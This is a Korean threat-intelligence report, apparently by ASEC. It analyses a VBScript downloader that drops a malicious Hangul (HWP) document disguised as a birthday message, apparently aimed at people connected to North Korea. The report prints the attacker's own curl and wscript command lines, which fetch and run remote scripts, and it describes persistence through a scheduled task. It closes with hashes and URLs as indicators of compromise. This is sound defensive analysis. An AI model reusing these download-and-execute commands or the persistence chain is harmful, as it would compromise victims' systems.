ASEC 분석팀은 최근 악성 한글 파일을 다운로드 하는 VBScript를 확인하였다. 해당 악성코드의 정확한 유포경로는 확인되지 않았지만 VBScript는 curl을 통해 다운로드 된다.
현재 확인된 명령어는 다음과 같다.
- curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
- cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp
두 명령어 모두 %APPDATA% 폴더에 vbtemp 명으로 스크립트를 저장한다. hxxp://datkka.atwebpages[.]com/2vbs 에는 아래 그림과 같이 작업 스케줄러 등록 및 추가 파일 다운로드 등의 기능을 수행하는 VBScript 코드가 존재한다.
다운로드 된 vbtemp 파일은 wscript //e:vbscript //b %APPDATA%\vbtemp 명령을 통해 실행된다. 스크립트가 정상적으로 실행되기 위해서는 %APPDATA% 폴더에 tmp~pth 파일이 존재해야 한다. 현재 tmp~pth 파일은 확인되지 않았지만 APPDATA 폴더의 경로가 저장되어 있을 것으로 추정된다.
vbtemp 파일 실행 시 curl 명령어를 통해 한글 파일(.hwp)을 다운로드 하고 %APPDATA%\tmp~pth 파일에 저장된 경로를 참조하여 해당 경로에 1.hwp 명으로 저장 및 실행한다. 이때 실행되는 명령어는 다음과 같다.
| cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32” hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [\tmp~pth에 저장된 경로]\ 1.hwp && [\tmp~pth에 저장된 경로]\1.hwp |
이후 위와 동일하게 curl 명령어를 사용하여 추가 스크립트를 다운로드 한다. 다운로드 된 스크립트는 %APPDATA%\Microsoft\Windows\Themes\TransWallpaper 로 저장된다. 또한, 앞서 다운로드 한 1.hwp 파일을 다시 한 번 실행한다.
| cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3027.64 Safari/537.32” hxxp://datkka.atwebpages[.]com/mal -o %APPDATA%\Microsoft\Windows\Themes\TransWallpaper && [\tmp~pth에 저장된 경로]\1.hwp |
생성된 TransWallpaper 파일은 작업 스케줄러 등록을 통해 30분 마다 스크립트가 자동 실행 될 수 있도록 한다.
해당 스크립트 파일은 hxxp://datkka.atwebpages[.]com/down.php에서 추가 명령어를 받아 실행한다. 현재는 “아래”cmd /c calc” 명령어가 수신되지만, 공격자에 의해 명령어 수정이 가능하며 이 경우 다양한 악성 행위가 발현될 수 있다.
앞서 1.hwp 로 저장한 한글 파일은 실행 시 %temp% 폴더에 HappyBirthday.vbs를 생성한다.
한글 파일 내부에는 상대 경로로 작성된 링크가 존재한다. 사용자가 링크를 클릭하면 ..\AppData\Local\Temp\HappyBirthday (2).vbs 파일이 실행된다. 이때 실행하는 파일명이 HappyBirthday (2).vbs인 이유는 vbtemp 스크립트 실행 시 1.hwp 파일을 두 번 실행하기 때문으로 보여진다. 단순히 사용자가 한글 파일을 클릭하여 실행할 경우 드롭되는 HappyBirthday.vbs의 파일명이 일치하지 않아 악성행위가 수행되지 않는다.
[그림 6]과 같이 한글 문서의 지은이는 국내 ‘한반도 평화교육 플랫폼’으로 확인되며 북한과 관련된 인물을 타겟하여 제작된 것으로 추정된다.
한글 파일에 의해 드롭 및 실행되는 HappyBirthday.vbs 는 hxxps://driver.googledocs.cloudns[.]nz/Yb/yb에 접속하여 추가 스크립트를 다운로드한 후 %appdata%\tmp~1 로 저장 및 실행한다.
| curl -k -H “”User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36″” hxxps://driver.googledocs.cloudns[.]nz/Yb/yb -o %appdata%\tmp~1 & wscript.exe //e:vbscript //b %appdata%\tmp~1 |
현재 hxxps://driver.googledocs.cloudns[.]nz/Yb/yb 에 접속이 불가하여 이후 행위는 확인이 불가하지만 공격자의 의도에 따라 다양한 악성 명령어가 실행될 수 있다.
악성코드의 정확한 유포 경로가 확인되지 않았지만 다양한 파일을 이용하고 있는 만큼 사용자의 주의가 필요하다. 출처가 불분명한 파일의 실행을 자제하고 사용하는 응용 프로그램 및 V3를 최신 버전으로 업데이트하여 사용해야한다.
[파일 진단]
Downloader/VBS.Agent
Dropper/HWP.Generic
[IOC]
7c38b40ec19609f32de2a70d409c38b0 (vbs)
60d117f5cb7b0f8133967ec535c85c6a (vbs)
d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs)
6083a1af637d9dd2b2a16538a17e1f45 (hwp)
ca2917006eb29171c9e5f374e789f53a (vbs)
hxxp://datkka.atwebpages.com/2vbs
hxxp://datarium.epizy.com/2vbs
hxxp://datkka.atwebpages.com/mal
hxxp://datkka.atwebpages.com/down.php
hxxps://driver.googledocs.cloudns[.]nz/Yb/yb
原文始发于ASEC:생일 축하 내용으로 위장한 악성 한글 문서 (OLE 개체)
相关文章
